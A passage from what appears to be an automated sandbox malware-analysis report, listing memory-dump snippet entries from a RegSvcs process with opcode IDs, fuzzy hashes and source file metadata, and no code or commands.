                                                              • Opcode Fuzzy Hash: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                              • Instruction Fuzzy Hash: 9C119E36250649AFDF258F59DA80B6E7BA8FB8A664F004519F9058F250C770EC42CFA1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                              • Instruction ID: e5342f020b8916f677024e7edf49d9ad9c0b1bcd77342ef213340259a09b058b
                                                              • Opcode Fuzzy Hash: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                              • Instruction Fuzzy Hash: 9411C276A00616AFDB22EF99CD80B5EFBB8FF84B40F500059DA05AF300D730AE418B90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                              • Instruction ID: 1f10018a3fcfc6d17f53d6faa32e7a724fcc541956f479d344c85e58013d7863
                                                              • Opcode Fuzzy Hash: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                              • Instruction Fuzzy Hash: 95019275500106AFC725DF19D889FAABBF9FBC5314F24826AE1068F261C7B09C42CB94
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction ID: 3d5dd3244ffd33f6b76805e7f1141ab5cf7d056e5c3869d5876b5018f258b690
                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction Fuzzy Hash: 0A11E5722416C2DBE723976CC984BAD7BD4FB41788F1D04A6DF419FA92F728C842C250
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction ID: 576ec7f1dfc6cd12722fbbcdc8d108c0846a4246f2c1fbc9c855165b51ff611d
                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction Fuzzy Hash: 8A019636700106AFF7265F58CD00F6A7AA9FB85750F098428EE059B264E772DD41C790
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction ID: edbbc46b62c62522605a151ab69509e8ab13b220221d75151d4d5b8c7b8bef4b
                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction Fuzzy Hash: FF0126314047229BDB319F19D840A3A7BE4FF557607008A6EFD96AF281D331D400CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                              • Instruction ID: 11a565f70b963dbd7b1b5ae44a3b0c653d0f7cfbf62d9948fd8c1d635804f1cc
                                                              • Opcode Fuzzy Hash: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                              • Instruction Fuzzy Hash: 05118B32241642EFDB26EF19DD90F56BBB8FF94B84F200465E9059F6A1C335ED01CA90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                              • Instruction ID: 3e0ce2132b0b441314d494eaa515cce3b17e2f48f1a5f11f8c53a54873b2afaa
                                                              • Opcode Fuzzy Hash: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                              • Instruction Fuzzy Hash: 79115A7054122AABEF75AB68CD52FEDB2B4BF44714F5041D4A318AA0E0DA709E85CF85
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                              • Instruction ID: 126f12304e87d594da8e2985f474b2421af066d83c607673305fd8bab4a8e102
                                                              • Opcode Fuzzy Hash: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                              • Instruction Fuzzy Hash: 4E11177790001AABCB21DB94CC80DEFBB7CFF48254F044166E906A7211EA34AA55CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction ID: 72025ccc691f7d8ea476506068ff067f2b97143a58f9cc6de9fa1d3f5a44a081
                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction Fuzzy Hash: 86014733601211ABEF159E6DD884B9AB7ABBFC4700F5544AAED058F246EE71CC81C391
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                              • Instruction ID: efd0229e3c0eb6e0e217b7c598d5b3f2962bf651f18c81ee8a863f61fcffd69d
                                                              • Opcode Fuzzy Hash: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                              • Instruction Fuzzy Hash: 4711A1326445569FD711CF68D800BA6BBB9FB9A314F08C159ED499F315D732EC81CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                              • Instruction ID: ab8f59d0478a38fb732fcadaf482233f096107b8021dcf6fcf9867b6b18e834c
                                                              • Opcode Fuzzy Hash: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                              • Instruction Fuzzy Hash: 0F111CB1A0020ADBCB00DF99D585A9EBBF4FF58250F14406AA905E7351D674EA018BA4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                              • Instruction ID: cbd58ce1859913511a51ca98b5a7b279321b30e7498ceb5a7f0fe6ff7ee2bfbb
                                                              • Opcode Fuzzy Hash: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                              • Instruction Fuzzy Hash: B9017135580212ABC732AE19CC5097BBBB9FFD2650B45842AE945AF711DB22DC43CBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction ID: 8c878b7419840832ebbbfcd784b3c763320543ef879aba43c4fa0da816c5fecc
                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction Fuzzy Hash: A201B532500706DFEB26AAAAC844AABB7F9FFC5654F04481EA9469F540DE70E402CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                              • Instruction ID: 37816373825f99689badd9dd585113fdf17ff4cdf775bbac5802cca35bc6565b
                                                              • Opcode Fuzzy Hash: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                              • Instruction Fuzzy Hash: 28112D75A0120DEBDB15DFA8CC51AAE7BB5FB84694F008099E9059B290D635AE11CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                              • Instruction ID: 6d28502f2679fd6c62591fc5a90d87c1d8f1ab26f535678d45e01fa96907892e
                                                              • Opcode Fuzzy Hash: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                              • Instruction Fuzzy Hash: 1D0184B1691902BFD251BB69CD81E5BBBECFF99654B400629B1098BA51DB24EC01C6A0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                              • Instruction ID: 8819c2c18be742037dd3091dbd20382b5cd7009c05aba803b3a043032ab04d6b
                                                              • Opcode Fuzzy Hash: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                              • Instruction Fuzzy Hash: 2901FC32214616DBC320DF6ECC4896BFBA8FF94660F114229ED598B2D0E7309911CBD1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                              • Instruction ID: 004db199c1632c4f2e2d3b323b245ccf595c1580f9f9f45a60fe6867c682e182
                                                              • Opcode Fuzzy Hash: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                              • Instruction Fuzzy Hash: BB115B75A41209EBDB15EFA8C844EAE7BB6FB98250F044059F90197354DA34E911CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                              • Instruction ID: 7609dc94053ea57eef1e0da4320d136c7d2bccbf7bb5fb141e75a628469b28aa
                                                              • Opcode Fuzzy Hash: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                              • Instruction Fuzzy Hash: 941179B16083099FC710DF69C84195FBBE4FF98310F00891AB998DB3A0E630E900CB92
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                              • Instruction ID: 3252bc532f6a6d86ade8d1d3e23a14b6a829ba1b833499f0f6aceaa886fc9b1d
                                                              • Opcode Fuzzy Hash: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                              • Instruction Fuzzy Hash: 551179B26083099FC310DF6DC84194FBBE4FF99350F00851AB958DB3A4E630E900CB92
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: 6c9f5be33d57c693e3ba68d71a367c699ebfa2e4885fefd750d467bceedb73bd
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: 4601D432200602EFD7219AADDC44F9ABBEEFBC6210F044819EA428B754DEB0F841C794
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: a3a7aa74c07b9d7af6f05b577064662136f123f6360b54473625999e5cbb022a
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: B9017832680681DFE326861DC948F2EBBE8FB88794F4904A1FA05CF6A1D678DC40C661
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                              • Instruction ID: 6cc030d491305e450f8b05f5bb72dabfaa3385787f30fbe58d59d3b01a98685d
                                                              • Opcode Fuzzy Hash: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                              • Instruction Fuzzy Hash: 6D018431700A09DBDB14FB69DC149AE77E9FF81610B594169DA02BF644EE20DD01C794
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                              • Instruction ID: 4db9de742a750e5a2d4baec6db52aa9a223a150fe81323f3aca4c333af119f5c
                                                              • Opcode Fuzzy Hash: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                              • Instruction Fuzzy Hash: 62018F71680602AFD3366F19DD41F16BAA8AF95F50F01442AE2069F390D7B1D8418B68
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                              • Instruction ID: 44492d2ceaf5e4fe2fd048af4741ce7187c71b1960e4ba66756c8eb646af87c0
                                                              • Opcode Fuzzy Hash: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                              • Instruction Fuzzy Hash: 83F0A932A41711BBC731DB568D50F5BBEA9FFC4B90F154429A6059F640DA30DD01C6A1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: ec5709b8e8d06f22214f30a710943d5235413cc96c4b33a7a736e5ecfbc925c8
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: 9DF062B2600615ABD334CF4DDC40E5BFBEAEBD5A90F058169A655DB220EA31ED05CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 47b808f967b7de3f08240f374ba88e28acbe6445d1a4b40ea57335f3e7e289f4
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: 49F0FC73244623ABD73236598840BAFB9D5BFE1A64F1A0035E205BF240CD648D0396F0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: b1254094f2ea8d9aebf6e383ecf6f748c5bba85fa3f2e2584f973bd6e9122f30
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: 2D01A231601685AFD327DA9DCD09B5EBB98FF51B54F094469FA488F7A1D7A4C800C251
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                              • Instruction ID: 966dd5d5ac826c09ba6a55dba2f2a1430372830a4ba0bf20db5be4207e41a811
                                                              • Opcode Fuzzy Hash: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                              • Instruction Fuzzy Hash: 5E014F71A0024AEBDB14DFA9E845AEEBBF8BF58314F14405AE501BB390D774EA01CB95
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: 3fcf55d92ac92e28293a5e81589c798b1b60c854bc7449f00967924c6c8e5a91
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: A0F0F97220001EBFEF019F95DD80DAF7B7EFB99298B144125FA1196160D671DD21ABA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                              • Instruction ID: 14c5b314d34cdd41e0af1a91eaece8d08b773bd5f13592661311feee7b91f8db
                                                              • Opcode Fuzzy Hash: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                              • Instruction Fuzzy Hash: 17018936105149EBCF129E94DC40EDE7F66FB4C754F098205FE1966224C736D971EB81
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                              • Instruction ID: a5a6e15789e29eddcf7423360b0723a4b3ec04de62c4fbf73df7568bac72b3e7
                                                              • Opcode Fuzzy Hash: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                              • Instruction Fuzzy Hash: A8F024716142425BF714B6299C81BA332DAF7E4754F25846AEB099F2C1E970DC0183F4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                              • Instruction ID: bd4793aba174694b5354ea48b8f623765206a07d90f5be9a2959a0905b55ea6a
                                                              • Opcode Fuzzy Hash: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                              • Instruction Fuzzy Hash: 3701A470240682DFF3379FACCD48B2A77E4BB54F44F980598BA018F7DADB68D5018614
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: 9e8200905a20c2269d5b47346d29558f5b820e4f1fbe1e005126a7d14914af1b
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: DDF0E231B81A234BFB36AA2F8C20B2EEA96AFD0E40B05052C9611CB780DF20DC018780
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: d2cd73ffa624666e99a351d539025162e6d293e6f9bc20b6787d1d6fddddb455
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 03F0B432B505129FD3628A4DDC80F16B769BFD5A60F5E0024AE049B368C361EC0287D0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                              • Instruction ID: 51a09b4c9239cc714d3622adffffa39f085d2ef23a9b601be5dad0e5204d0857
                                                              • Opcode Fuzzy Hash: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                              • Instruction Fuzzy Hash: 0CF0AF706153059FC360EF69C845A1EBBE4FF98710F44465ABC98DB394E634E901C796
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
